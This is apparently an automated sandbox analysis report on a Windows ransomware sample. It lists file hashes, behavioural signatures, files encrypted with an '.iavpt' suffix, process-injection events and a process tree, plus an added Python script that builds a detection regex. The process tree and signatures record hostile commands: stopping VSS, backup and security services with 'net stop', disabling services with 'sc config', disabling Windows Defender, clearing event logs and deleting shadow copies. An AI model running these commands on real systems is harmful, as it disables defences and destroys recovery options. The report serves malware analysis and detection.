Analysis
max time kernel: 146s
max time network: 222s
platform: windows10_x64
resource: win10-en-20211208
submitted: 12-01-2022 19:26
Static task: static1
Behavioral task: behavioral1
  Sample: 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
  Resource: win10-en-20211208
General
Target: 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
Size: 2.7MB
MD5: 8486072a80d4cef5b18407ffa74a965d
SHA1: b3bbdd7d990092b8545c04bf6cea5572c1d1cb4c
SHA256: 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1
SHA512: dea0bc47c7b3b178e128d2349ede55d7c13cd5884ce49a178668b9e0a527f2f415eef432a5523c8c129436e37d8a7f424ce0dbebf95b89e22a9d7a1c15c083e5
Malware Config
Signatures
Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the mpcmdrun utility to delete all AV definitions.
Processes: MpCmdRun.exe (PID 2764)

Modifies security service (2 TTPs, 1 IoC)
Processes: reg.exe
  Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
  (Start = 4 is SERVICE_DISABLED: the Defender service will not start at next boot.)

Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes: bcdedit.exe (PID 3912), bcdedit.exe (PID 3680)

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs)
Processes: 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe (every entry below)
File opened for modification:
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_DnTK7PokP380.iavpt
  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_JA-JP.respack
  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeAppList.targetsize-32_altform-unplated.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_1kPPmz_Z2bw0.iavpt
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_62vLodfrHxI0.iavpt
  C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Orange.xml.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_3gGr2aH_BYM0.iavpt
  C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\CenterView.scale-180.png
  C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\StoreLogo.scale-150.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_QPJtQceSzFg0.iavpt
  C:\Program Files\Common Files\microsoft shared\ink\zh-CN\tipresx.dll.mui
  C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\7.jpg
  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\MainPage\mainPage_more_themes.jpg
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-explorer.xml.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_iDQQwple6hk0.iavpt
  C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraWideTile.contrast-black_scale-200.png
  C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\snooze.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailLargeTile.scale-150.png
  C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubStoreLogo.scale-200_contrast-white.png
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookLargeTile.scale-125.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailWideTile.scale-400.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\bg_get.svg.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_w-7-LaoP5sc0.iavpt
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_pTjNFEeNwaU0.iavpt
  C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-pl.xrm-ms.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_MI5BCxlwHfQ0.iavpt
  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Livetiles\MicrosoftSolitaireAppList.targetsize-40_altform-unplated.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_lPNdsMx2AWI0.iavpt
  C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-20_altform-unplated_contrast-black.png
  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\13c.png
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookWideTile.scale-100.png
  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\mk_16x11.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-48.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_bAGJ36vlgJg0.iavpt
  C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-ul-oob.xrm-ms.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_bTC7arMXKiM0.iavpt
  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\tv_16x11.png
  C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleSmallTile.scale-200.png
  C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-80.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_audit_report_18.svg.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_G_AzTkLXXaA0.iavpt
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_aDNUKyQG7Wc0.iavpt
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_jRC7aa3ub680.iavpt
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-text.xml.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_HPQJ92A4DRk0.iavpt
  C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16ConsumerPerp_Bypass30-ul-oob.xrm-ms.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_ccl8lsl312k0.iavpt
  C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN022.XML.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_YhUHI9SgoFc0.iavpt
  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionMedTile.scale-400.png
  C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Resources\RetailDemo\strings\en-us\resources.resjson
  C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\OperationValidationResources.psd1
  C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_KMS_Client-ul.xrm-ms.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_D6GkbtamK7c0.iavpt
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_VZp8cGpp9pA0.iavpt
  C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Grunge Texture.eftx.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT__3ANxj7ajvM0.iavpt
  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xecd1.png
  C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-32.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close2x.png.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_7uvTaMR98700.iavpt
  C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-BA\msipc.dll.mui.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_TYMWVKQ_M-E0.iavpt
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_uIrEA0rRcy00.iavpt
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_7DD4STECCQ00.iavpt
  C:\Program Files\Microsoft Office\root\Office16\OFFSYMSL.TTF.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_e4VeWvn7IF80.iavpt
  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppPackageSplashScreen.scale-100.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailSplashLogo.scale-100.png
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-100.png
  C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-72_altform-unplated_contrast-white.png
  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_OyHFUyw8MoY0.iavpt
  C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\msdaorar.dll.mui.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_IOfKApN4h480.iavpt
  C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldBeNullOrEmpty.snippets.ps1xml
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_K0CXDD53VGs0.iavpt
  C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_K_COL.HXK.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_5Vem_Z__QVE0.iavpt
  C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe\AppxSignature.p7x
  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\8041_24x24x32.png
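The renamed paths in the list above all share one naming scheme: the original name, a dot, a constant 43-character group, an underscore, an 11-character group that differs per file, the digit 0, and the extension .iavpt. The following script, which is an added example and not sandbox output or the sample's own code, derives that structure from the paths themselves (longest common prefix and suffix of the appended part) and turns it into a hunting regex for file-system and EDR telemetry. ENTRIES is a transcribed subset of the 64 paths in the report. Reading the 43-character group as 32 base64url-encoded bytes and the 11-character group as 8 bytes is an inference from their lengths only; the report does not say what they encode.

```python
"""Derive the encrypted-file naming pattern from the file IoCs above and
turn it into a hunting regex.

Added example for this report, not sandbox output or the sample's code.
ENTRIES are transcribed from the report (a subset of the 64 paths; the
process column, always the sample itself, is omitted). Treating the
43-character constant as 32 base64url bytes and the 11-character
variable part as 8 bytes is an inference from their lengths only.
"""
import base64
import ntpath
import os
import re
from collections import Counter

ENTRIES = [
    r"C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_DnTK7PokP380.iavpt",
    r"C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_JA-JP.respack",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_1kPPmz_Z2bw0.iavpt",
    r"C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Orange.xml.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_3gGr2aH_BYM0.iavpt",
    r"C:\Program Files\Common Files\microsoft shared\ink\zh-CN\tipresx.dll.mui",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\bg_get.svg.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_w-7-LaoP5sc0.iavpt",
    r"C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Grunge Texture.eftx.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT__3ANxj7ajvM0.iavpt",
    r"C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\msdaorar.dll.mui.TpkGFG5B_qYjMrTPvZptjgRyBMr0I62_-_LntRfVRAT_IOfKApN4h480.iavpt",
    r"C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\OperationValidationResources.psd1",
]

# Everything between the last dot of the original name and ".iavpt".
ENC_TAIL = re.compile(r"\.([A-Za-z0-9_-]+)\.iavpt$")


def split_entry(path):
    """(original_path, appended_part) for a renamed file; (path, None) otherwise."""
    m = ENC_TAIL.search(path)
    return (path[:m.start()], m.group(1)) if m else (path, None)


def b64url_bytes(s):
    """Byte length of an unpadded base64url string (raises if it is not base64url)."""
    return len(base64.urlsafe_b64decode(s + "=" * (-len(s) % 4)))


def derive_pattern(paths):
    """Split the appended part into constant marker, per-file variable part and constant tail."""
    split = [split_entry(p) for p in paths]
    tails = [t for _, t in split if t]
    prefix = os.path.commonprefix(tails)                       # constant head
    tail = os.path.commonprefix([t[::-1] for t in tails])[::-1]  # constant end
    variable = [t[len(prefix):len(t) - len(tail)] for t in tails]
    marker = prefix.rstrip("_")   # the "_" before the variable part is a separator
    return {
        "marker": marker,
        "marker_bytes": b64url_bytes(marker),
        "variable_len": {len(v) for v in variable},
        "variable_bytes": {b64url_bytes(v) for v in variable},
        "tail": tail,
        "extensions": Counter(ntpath.splitext(o)[1].lower() for o, t in split if t),
        "touched_unrenamed": [o for o, t in split if not t],
    }


def hunting_regex(info):
    """Filename regex built from the derived structure: .<marker>_<variable><tail>.iavpt"""
    lo, hi = min(info["variable_len"]), max(info["variable_len"])
    return re.compile(r"\." + re.escape(info["marker"])
                      + r"_[A-Za-z0-9_-]{%d,%d}%s\.iavpt$" % (lo, hi, re.escape(info["tail"])))


if __name__ == "__main__":
    info = derive_pattern(ENTRIES)
    rx = hunting_regex(info)
    print("marker:", info["marker"], "=", info["marker_bytes"], "bytes")
    print("variable part:", info["variable_len"], "chars =", info["variable_bytes"], "bytes")
    print("hunt:", rx.pattern)
    print(sum(bool(rx.search(p)) for p in ENTRIES), "of", len(ENTRIES), "entries match")
    print("targeted extensions:", dict(info["extensions"]))
```

The marker is identical across all 64 entries while the 11-character part never repeats, so the regex should be keyed on the marker only; a sample from another victim or build would likely carry a different marker, and a hunt for `\.iavpt$` alone catches those too. The entries under `WindowsApps` that the sample opened but did not rename (PNG, MUI, RESPACK, PSD1 and so on) are kept separately as `touched_unrenamed`, since the report shows the open but not a rename for them.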
Launches sc.exe
sc.exe is the Windows utility for controlling services on the system.
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (PID 1680)

Modifies registry class (3 IoCs)
Processes: reg.exe
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP
  Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP
  (EPP is the Microsoft Defender shell extension behind the "Scan with Microsoft Defender" context-menu entry; deleting these three keys removes it for files, directories and drives.)

Runs net.exe
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes: powershell.exe (PID 2564, 3 events), powershell.exe (PID 1780, 3 events), 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe (PID 3224, 2 events)
Suspicious use of AdjustPrivilegeToken (64 IoCs; the sandbox caps this list at 64 entries)
Processes: wevtutil.exe (PIDs 1848, 2424, 2140), wmic.exe (PIDs 1164, 2428)
  wevtutil.exe PID 1848: SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe PID 2424: SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe PID 2140: SeSecurityPrivilege, SeBackupPrivilege
  wmic.exe PID 1164: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  wmic.exe PID 2428 (first pass): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  wmic.exe PID 2428 (second pass, cut off by the 64-entry cap): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
  (The numeric entries 33 to 36 are privilege LUIDs the sandbox did not resolve to names. SeSecurityPrivilege plus SeBackupPrivilege on three wevtutil.exe instances is consistent with the "Clears Windows event logs" signature above. wmic.exe routinely enables every privilege present in its token when it starts, so its long list is weak evidence on its own.)
Suspicious use of WriteProcessMemory (64 IoCs; the sandbox caps this list at 64 entries)
Processes: 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe (PID 3224), net.exe (PIDs 1708, 1252, 1920, 708, 884, 1872, 536, 1248, 1776)
Each write is recorded twice by the sandbox; the 32 distinct source/target pairs are:
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 1708 (net.exe)
  PID 1708 (net.exe) wrote to memory of PID 3708 (net1.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 1252 (net.exe)
  PID 1252 (net.exe) wrote to memory of PID 2912 (net1.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 1920 (net.exe)
  PID 1920 (net.exe) wrote to memory of PID 1764 (net1.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 708 (net.exe)
  PID 708 (net.exe) wrote to memory of PID 3548 (net1.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 884 (net.exe)
  PID 884 (net.exe) wrote to memory of PID 1216 (net1.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 1872 (net.exe)
  PID 1872 (net.exe) wrote to memory of PID 1440 (net1.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 536 (net.exe)
  PID 536 (net.exe) wrote to memory of PID 2248 (net1.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 1248 (net.exe)
  PID 1248 (net.exe) wrote to memory of PID 2388 (net1.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 1776 (net.exe)
  PID 1776 (net.exe) wrote to memory of PID 1996 (net1.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 2576 (sc.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 2460 (sc.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 3220 (sc.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 2980 (sc.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 3692 (sc.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 3656 (sc.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 1876 (sc.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 2396 (sc.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 3096 (sc.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 1624 (reg.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 2176 (reg.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 3800 (reg.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 1536 (reg.exe)
  PID 3224 (16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe) wrote to memory of PID 3168 (reg.exe)
Processes
Depth / PID / image path, followed by the command line and the signatures that fired on that process:

1  PID 3224  C:\Users\Admin\AppData\Local\Temp\16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe
   cmd: "C:\Users\Admin\AppData\Local\Temp\16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe"
   sig: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  2  PID 1708  C:\Windows\SYSTEM32\net.exe
     cmd: net.exe stop "SamSs" /y
     sig: Suspicious use of WriteProcessMemory
    3  PID 3708  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "SamSs" /y
  2  PID 1252  C:\Windows\SYSTEM32\net.exe
     cmd: net.exe stop "SDRSVC" /y
     sig: Suspicious use of WriteProcessMemory
    3  PID 2912  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "SDRSVC" /y
  2  PID 1920  C:\Windows\SYSTEM32\net.exe
     cmd: net.exe stop "SstpSvc" /y
     sig: Suspicious use of WriteProcessMemory
    3  PID 1764  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "SstpSvc" /y
  2  PID 708  C:\Windows\SYSTEM32\net.exe
     cmd: net.exe stop "UI0Detect" /y
     sig: Suspicious use of WriteProcessMemory
    3  PID 3548  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "UI0Detect" /y
  2  PID 884  C:\Windows\SYSTEM32\net.exe
     cmd: net.exe stop "vmicvss" /y
     sig: Suspicious use of WriteProcessMemory
    3  PID 1216  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "vmicvss" /y
  2  PID 1872  C:\Windows\SYSTEM32\net.exe
     cmd: net.exe stop "VSS" /y
     sig: Suspicious use of WriteProcessMemory
    3  PID 1440  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "VSS" /y
  2  PID 536  C:\Windows\SYSTEM32\net.exe
     cmd: net.exe stop "wbengine" /y
     sig: Suspicious use of WriteProcessMemory
    3  PID 2248  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "wbengine" /y
  2  PID 1248  C:\Windows\SYSTEM32\net.exe
     cmd: net.exe stop "WebClient" /y
     sig: Suspicious use of WriteProcessMemory
    3  PID 2388  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "WebClient" /y
  2  PID 1776  C:\Windows\SYSTEM32\net.exe
     cmd: net.exe stop "UnistoreSvc_12e21" /y
     sig: Suspicious use of WriteProcessMemory
    3  PID 1996  C:\Windows\system32\net1.exe
       cmd: C:\Windows\system32\net1 stop "UnistoreSvc_12e21" /y
  2  PID 2576  C:\Windows\SYSTEM32\sc.exe
     cmd: sc.exe config "SamSs" start= disabled
